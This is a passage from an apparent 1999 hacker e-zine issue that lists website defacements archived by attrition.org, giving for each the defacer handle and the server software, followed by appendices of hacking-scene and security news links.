Defaced by: nitroburn
Operating System: Linux (Apache 1.3.3)

Defaced domain: www.socioambiental.org
Site Title: Instituto Socioambiental
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.socioambiental.org
Defaced by: c3zar
Operating System: Irix (Rapidsite/Apa-1.3.4)

Defaced domain: www.optimumsettings.com
Site Title: CEO Software, Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.optimumsettings.com
Defaced by: wkD
Operating System: Linux (Apache/1.3.4)

Defaced domain: coldwellbankerj-s.com
Site Title: Coldwell Banker Justrom & Stromme
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/coldwellbankerj-s.com
Defaced by: DHC
Operating System: Linux (Apache 1.2.4)

Defaced domain: www.themillcasino.com
Site Title: The Mill Casino
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.themillcasino.com
Defaced by: DHC
Operating System: Linux (Apache 1.2.4)

Defaced domain: www.pioneerimplement.com
Site Title: Pioneer Implement
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.pioneerimplement.com
Defaced by: DHC
Operating System: Linux (Apache 1.2.4)

Defaced domain: www.schedulerplus.com
Site Title: CEO Software
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.schedulerplus.com
Defaced by: wkD
Operating System: Linux (Apache 1.3.4)

Defaced domain: www.votedbest.com
Site Title: Irmo News
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.votedbest.com
Defaced by: Uneek
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.indev.nic.in
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.indev.nic.in
Defaced by: c0rvus
Operating System: Windows NT (IIS/4.0)

Defaced domain: beta.intuit.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/beta.intuit.com
Defaced by: Uneek Technologies
Operating System: Windows NT (WebSitePro/1.1h)

Defaced domain: www.css.com
Site Title: Consult Supply Support
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.css.com
Operating System: FreeBSD 2.2.1 - 3.0
Attrition comment: Defacement implies site was RM'd

Defaced domain: www.bhv.hn
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.bhv.hn
Defaced by: xhostile & acidklown
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.swoya.com
Site Title: Boys & Girls Club of Southwestern Oregon
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.swoya.com
Defaced by: DHC
Operating System: Linux

Defaced domain: www.mtb.gov.br
Site Title: Ministerio do Trabalho e do Emprego
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.mtb.gov.br
Defaced by: inferno.br
Operating System: Windows NT

Defaced domain: www.kdcq.com
Site Title: K-Dock Oldies 93.5
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.kdcq.com
Defaced by: DHC
Operating System: Linux

Defaced domain: www.trt6.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.trt6.gov.br
Defaced by: Einstein
Operating System: WinNT

Defaced domain: www.memphischamber.com
Site Title: Towery Publishing
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.memphischamber.com
Defaced by: bansh33 and Analognet
Operating System: Irix

Previously Hacked
Defaced domain: www.salton-maxim.com
Site Title: Samantha Dreimann
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.salton-maxim.com
Defaced by: p4riah
Operating System: WinNT

Previously Hacked
Defaced domain: www.hwa.net
Site Title: Hoefer WYSOCKI Architects
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.hwa.net
Defaced by: n4rfy
Operating System: WinNT

Defaced domain: www.cuztom.com
Site Title: Cuztom Incorporated
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.cuztom.com
Defaced by: cipher
Operating System: WinNT

Defaced domain: www.ordsvy.gov.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ordsvy.gov.uk
Defaced by: Sarin
Operating System: Windows NT (IIS/4.0)
HIDDEN comments in the HTML

Defaced domain: www.nctsjax.navy.mil
Site Title: Navy Computer and Telecommunications Station, Jacksonville Florida
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.nctsjax.navy.mil
Defaced by: s01o and k-0s
Operating System: Windows NT

Defaced domain: aoc.gov
Site Title: The Architect of the United States Capitol
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/aoc.gov
Defaced by: Verb0
Operating System: Windows NT

Defaced domain: cpma.apg.army.mil
Site Title: Civilian Personnel Operations Center Management Agency
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/cpma.apg.army.mil
Defaced by: s01o and k-0s
Operating System: Windows NT

Previously Hacked
Defaced domain: www.learncomm.org
Site Title: Kiel Woodward Associates
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.learncomm.org
Defaced by: DHC
Operating System: Irix

Defaced domain: www.zetcom.ru
Site Title: Zetcom
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.zetcom.ru
Defaced by: Z0omer
Operating System: Windows NT

Previously Hacked
Defaced domain: www.pietersburg.org.za
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.pietersburg.org.za
Defaced by: aKt0r & DajinX
Operating System: Windows NT (IIS/4.0)
Attrition comment: Previously defaced on 99.09.18 by 139_r00ted - one of 11 .za domains hacked

Previously Hacked
Defaced domain: www.asesor.com.pe
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.asesor.com.pe
Defaced by: bean0
Operating System: Windows NT (IIS/4.0)
Attrition comment: Previously defaced on 99.11.29 by acidkl0wn

Defaced domain: www.colts.com
Site Title: National Football League
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.colts.com
Defaced by: Tr1pl3 S31S
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.isaltda.com.uy
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.isaltda.com.uy
Defaced by: m0zy
Operating System: Windows NT (Lotus-Domino/Versión-4.6.3a)

Defaced domain: www.ta-eng.com
Site Title: TA Engineering
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ta-eng.com
Defaced by: himi
Operating System: Windows NT (IIS/4.0)

and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file; there is now a links
section at http://welcome.to/HWA.hax0r.news/ so check there for current
links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondents and others please send in news site links that have
security news from foreign countries for inclusion in this list thanks... - Ed

Belgium.......: http://securax.org/cum/ *New address*
Brazil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada........: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland.......: http://hackunlimited.com/
Germany.......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa..: http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? Email it to hwa@press.usmc.net and I'll review it and post it here if it merits it.

@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
